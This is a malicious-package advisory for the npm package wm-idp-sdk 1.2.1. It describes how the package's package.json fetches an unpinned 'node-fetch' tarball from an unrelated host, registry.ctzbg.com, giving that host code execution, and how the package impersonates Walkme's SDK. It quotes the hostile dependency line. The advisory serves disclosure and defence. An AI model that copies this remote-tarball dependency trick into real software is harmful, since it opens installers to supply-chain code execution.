VYPR

npm · Malicious package advisory

Malware

wm-idp-sdk

MAL-2026-4808

Malicious code in wm-idp-sdk (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (d2acf2a0d94ec1d2bada80f3251f5ecbea64d78ffadcab2b997b9708c2ae71cd)
package.json declares `"node-fetch": "https://registry.ctzbg.com/wm-idp-sdk/node-fetch"` — a direct HTTPS tarball URL hosted on a domain (`registry.ctzbg.com`) unrelated to the SDK's apparent publisher (walkme.com). The URL has no version pin, no commit/tag, and no integrity hash, so every `npm install` fetches whatever bytes the operator of that host currently serves and installs them as the package's `node-fetch`. `dist/main.js` then `require('node-fetch')` at module top, so the fetched code executes in any process that imports `wm-idp-sdk`. The host owner can swap the payload at any time without republishing wm-idp-sdk, giving them an open code-execution channel into every installer. The package additionally impersonates Walkme's IDP SDK (description references `WM Identity Provider`, posts to `https://ec.walkme.com/event/log`, uses storage key `wm-ic-idp-end-user-info`) while being published by the personal npm account `hwmenv` rather than the `@walkme/*` scope — namespace-abuse intent that compounds the install-time-RCE risk.

Compromised versions (1)

  • 1.2.1

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.